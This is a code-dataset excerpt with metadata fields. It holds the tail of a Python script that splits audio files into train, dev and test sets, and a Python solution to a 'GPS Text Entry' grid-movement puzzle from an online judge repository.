for line in lines_sample:
ofp.write(line + '\n')
audio_file = line.split(',')[0]
audio_set.add(audio_file)
output_audio_path = output_audio_dir + audio_file
src_audio_path = train_dir + audio_file
copyfile(src_audio_path, output_audio_path)
return audio_set
train_audio_set = create_set(output_csv_train, train_lines, audio_train)
dev_audio_set = create_set(output_csv_dev, dev_lines, audio_dev)
test_audio_set = create_set(output_csv_test, test_lines, audio_test)
assert len(train_audio_set.intersection(dev_audio_set)) == 0
assert len(train_audio_set.intersection(test_audio_set)) == 0
assert len(dev_audio_set.intersection(test_audio_set)) == 0
assert len(train_audio_set) + len(dev_audio_set) + len(test_audio_set) == len(lines)
|
[
"harisankarh@gmail.com"
] |
harisankarh@gmail.com
|
449e1d12345df92a61d5b5437d8838435098877e
|
cacdbf688209cce2f39698758346b99de7d5281d
|
/GPS Text Entry.py
|
86c0928ec058b6d6aed34778751c9d97b246cb63
|
[] |
no_license
|
Federico-PizarroBejarano/Don-Mills-Online-Judge
|
27d168e390cdf7be104117d6a699fd7df4104b63
|
6e77978a19d29ec3095687b71dc8eff3565f6a60
|
refs/heads/master
| 2021-05-11T09:14:24.849165
| 2018-01-19T03:42:06
| 2018-01-19T03:42:06
| 118,072,968
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
def find(x):
for i in range(5):
if x in fir[i]:
return [i, fir[i].index(x)]
fir = [["A", "B", "C", "D", "E", "F"], ["G", "H", "I", "J", "K", "L"],
["M", "N", "O", "P", "Q", "R"], ["S", "T", "U", "V", "W", "X"],
["Y", "Z", " ", "-", ".", "/"]]
word = input() + "/"
total = 0
movesy = [0]
movesx = [0]
for i in word:
desy, desx = find(i)
movesy.append(desy)
movesx.append(desx)
for i in range(len(movesy) - 1):
total += abs(movesy[i] - movesy[i+1])
for i in range(len(movesx) - 1):
total += abs(movesx[i] - movesx[i+1])
print(total)
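# Worked example (assuming the cursor starts at 'A' in the top-left corner):
# for input "B", 'B' is at row 0, col 1 and the appended '/' is at row 4,
# col 5, so total = (0 + 1) + (4 + 4) = 9.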
|
[
"noreply@github.com"
] |
Federico-PizarroBejarano.noreply@github.com
|